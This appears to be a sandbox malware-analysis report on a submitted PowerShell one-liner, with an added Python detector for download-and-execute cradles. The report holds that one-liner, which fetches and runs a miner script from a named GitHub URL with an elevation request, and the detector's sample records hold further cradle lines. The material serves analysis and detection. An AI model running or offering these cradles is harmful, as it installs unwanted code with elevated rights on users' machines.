
Analysis

  • max time kernel
    246s
  • max time network
    300s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
  • submitted
    26/06/2024, 23:29

General

  • Target

    http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex

    Note: the submitted target is not a URL but a PowerShell download-and-execute one-liner (an irm ... | iex cradle wrapped in Start-Process -Verb RunAs, which would trigger a UAC elevation prompt), pasted into the URL submission field. The sandbox therefore handed the whole string to Internet Explorer as a command-line argument. No powershell.exe appears in the process tree, the Network section is empty and no file named windows.ps1 is listed under Downloads, so nothing on this page shows the script being fetched or executed; the signatures below are Internet Explorer start-up behaviour only.

Malware Config

Signatures

  • Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 52 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
    1⤵
    • Access Token Manipulation: Create Process with Token
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4676
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4676 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:864
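
The distinction that matters in this report is between a cradle string that is merely carried as an argument (iexplore.exe here) and one that is actually evaluated by a PowerShell host. The following detector is an editor-added example, not part of the tria.ge report or of the submitted script: it runs over constructed (image, command line) records in the shape the Processes section shows, the first two being the two iexplore.exe entries above and the remaining three constructed for contrast with the hypothetical host example.invalid, and flags the irm/iwr ... | iex pattern, the -Verb RunAs elevation request, and whether the image is a PowerShell host.

```python
import ntpath
import re
from typing import NamedTuple, Optional

# Image names that actually evaluate PowerShell. A cradle string carried as an
# argument to any other image (here: iexplore.exe) is data, not execution.
POWERSHELL_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}

# "<download cmdlet> <url> ... | iex" in alias or full-cmdlet spelling. The URL
# is captured from the cradle itself, not from the first http:// in the line
# (the report's target starts with the bogus "http://start-process").
CRADLE_RE = re.compile(
    r"""\b(?:irm|iwr|invoke-restmethod|invoke-webrequest)\s+(?:-uri\s+)?"""
    r"""(?P<url>https?://[^\s|'"]+)[^|]*\|\s*(?:iex|invoke-expression)\b""",
    re.IGNORECASE,
)

# Start-Process -Verb RunAs requests elevation through a UAC prompt.
ELEVATION_RE = re.compile(r"-verb\s+runas\b", re.IGNORECASE)


class Finding(NamedTuple):
    image: str          # lower-cased basename of the process image
    cradle: bool        # cradle pattern present anywhere in the command line
    elevation: bool     # -Verb RunAs present
    executed: bool      # cradle present AND the image is a PowerShell host
    url: Optional[str]  # URL the cradle would fetch, if a cradle was found


def classify(image_path: str, cmdline: str) -> Finding:
    image = ntpath.basename(image_path).lower()   # ntpath handles C:\ paths on any OS
    m = CRADLE_RE.search(cmdline)
    cradle = m is not None
    return Finding(
        image=image,
        cradle=cradle,
        elevation=ELEVATION_RE.search(cmdline) is not None,
        executed=cradle and image in POWERSHELL_HOSTS,
        url=m.group("url") if m else None,
    )


def analyse(processes):
    return [classify(img, cmd) for img, cmd in processes]


def summarise(findings):
    return {
        "cradle_strings": sum(f.cradle for f in findings),
        "elevation_requests": sum(f.elevation for f in findings),
        "executed_cradles": sum(f.executed for f in findings),
    }


# Constructed sample records. Records 0 and 1 are the two iexplore.exe entries
# from this report; records 2-4 are made up for the example (example.invalid is
# a reserved, non-resolving name) and are not from the original analysis.
SAMPLE_PROCESSES = [
    (r"C:\Program Files\Internet Explorer\iexplore.exe",
     r'"C:\Program Files\Internet Explorer\iexplore.exe" http://start-process PowerShell -verb runas '
     r"irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex"),
    (r"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE",
     r'"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4676 CREDAT:82945 /prefetch:2'),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     'powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "irm https://example.invalid/payload.ps1 | iex"'),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -Command \"Start-Process PowerShell -Verb RunAs "
     "-ArgumentList 'iwr https://example.invalid/payload.ps1 | iex'\""),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     'powershell.exe -Command "Get-Date"'),
]


if __name__ == "__main__":
    findings = analyse(SAMPLE_PROCESSES)
    for f in findings:
        state = "EXECUTED" if f.executed else ("string only" if f.cradle else "-")
        print(f"{f.image:<16} cradle={state:<12} elevation={f.elevation!s:<5} url={f.url}")
    print(summarise(findings))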

Network

MITRE ATT&CK Enterprise v15


Downloads

The files listed here are Internet Explorer start-up artifacts, not payloads: CryptnetUrlCache is the CryptoAPI cache for certificate-chain and revocation fetches, VersionManager\ver*.tmp and INetCache\suggestions[1].en-US are IE update and search-suggestion caches, and the .cookie file is a browser cookie. The windows.ps1 script named in the target does not appear.

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
    Filesize: 4KB
    MD5: 1bfe591a4fe3d91b03cdf26eaacd8f89
    SHA1: 719c37c320f518ac168c86723724891950911cea
    SHA256: 9cf94355051bf0f4a45724ca20d1cc02f76371b963ab7d1e38bd8997737b13d8
    SHA512: 02f88da4b610678c31664609bcfa9d61db8d0b0617649981af948f670f41a6207b4ec19fecce7385a24e0c609cbbf3f2b79a8acaf09a03c2c432cc4dce75e9db

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    Filesize: 471B
    MD5: 5f0847e5a15af2d7923393c3cd30c5d1
    SHA1: 326c44f2bc29ec6578a400d6d46361efcb013540
    SHA256: 28766e681bf500e9cddbcd3275cd898c4165354ad087c2461d9ee374a7e2221e
    SHA512: a83751183cd1f2ac063a0077f8edfaecda72a4649437070c83f88151c822ff42d43fb8a291c123af2598e10d15cbdc147cef353b2149baca9462fb02e3d67a06

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
    Filesize: 338B
    MD5: a38bd47572dd302e0424818361c87a03
    SHA1: c1922b139e11e4e7cb65da2383a8f0e1a8874317
    SHA256: 4658a590eb6ffbd6f1b380105c2aa4c5a466520b08565bbf0d40d2cdf32d1272
    SHA512: 7d63f310812efc116ed11b9f034c9a4fbad7e9fbf47be6446f4a732e665dcd4140c71ee49c49af4568d2d0050ea371c76d67c24994c62ca081103e347ee3bb82

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    Filesize: 404B
    MD5: 40b4a0a58f2c4053999f84d746e9269d
    SHA1: 4759d40d04269a42a0b4728bd3efda44c8dcfe51
    SHA256: abec5029e904b4839927c0fc06013a6d22f41233740a981883616e12208fe897
    SHA512: 7eb8b37d1eee1bb1825d92862cd244b1064c2ee10484e6dfa62002483e939c0be76f27c31b2a338801ae2cd3b3401f4f9f24ecf427408fc38f105cdbee0aff26

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\verDE98.tmp
    Filesize: 15KB
    MD5: 1a545d0052b581fbb2ab4c52133846bc
    SHA1: 62f3266a9b9925cd6d98658b92adec673cbe3dd3
    SHA256: 557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1
    SHA512: bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\TQAR3J3W\suggestions[1].en-US
    Filesize: 17KB
    MD5: 5a34cb996293fde2cb7a4ac89587393a
    SHA1: 3c96c993500690d1a77873cd62bc639b3a10653f
    SHA256: c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
    SHA512: e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\Z8S224E8.cookie
    Filesize: 545B
    MD5: 228d114ac6e061ec428fe183d0d2c756
    SHA1: 9891d9f0f8a932e431a0d3fc7e8aa99160600df5
    SHA256: 7a62c8760c3790e6b12ae98282fb7459978c5224f6cf2c0bade271183e394bc0
    SHA512: 956aa0b02dbbecde2babad124452f31154f20516f580855f1c8fe9ba0f635e3affb6bdbbd418bc7c14bdb2b962db9ff45b5d5c05950ee31a33fe4148be99c683